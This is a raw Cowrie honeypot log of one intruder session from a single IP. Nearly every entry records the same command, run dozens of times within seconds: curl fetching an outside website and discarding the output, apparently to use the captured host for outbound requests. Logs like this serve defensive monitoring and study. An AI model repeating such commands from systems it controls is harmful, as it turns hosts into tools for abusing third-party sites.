{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.740093Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.777653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.778767Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.819041Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.819973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.857569Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.858516Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.895164Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.896068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.933921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.934857Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.015972Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.017029Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.063329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.064391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.116722Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.117719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.155937Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.156940Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.195260Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.196280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.237554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.238578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.279000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.279947Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.317399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.318354Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.365623Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.366594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.404320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.405407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.442980Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.443837Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.486179Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.487417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.545365Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.546277Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.584359Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.585292Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.623841Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.624932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.673808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.674738Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.717899Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.718928Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.760714Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.761952Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.804207Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.805168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.844872Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.845881Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.883275Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.884248Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.928969Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.929981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:51.990226Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:51.990953Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.030038Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.030985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.072660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.073621Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.110656Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.111679Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.149544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.150522Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.191985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.193161Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.231557Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.232588Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.269651Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.270643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.318215Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.319366Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.363106Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.364404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.423726Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.424676Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.462244Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.463273Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.500057Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.501350Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.537817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.538834Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.575485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.576357Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.619069Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.620029Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.668659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.669656Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.714938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.715958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.761352Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.762390Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.800276Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.801287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.850602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.851761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.888529Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.889612Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.926584Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.927562Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:52.965398Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:52.966327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.004132Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.005099Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.059222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.060163Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.098486Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.099720Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.138109Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.139013Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.176619Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.177522Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.218868Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.220153Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.270570Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.271581Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.310112Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.310932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.347574Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.348438Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.385430Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.386297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.425452Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.426520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.463741Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.464600Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.502312Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.503425Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.541368Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
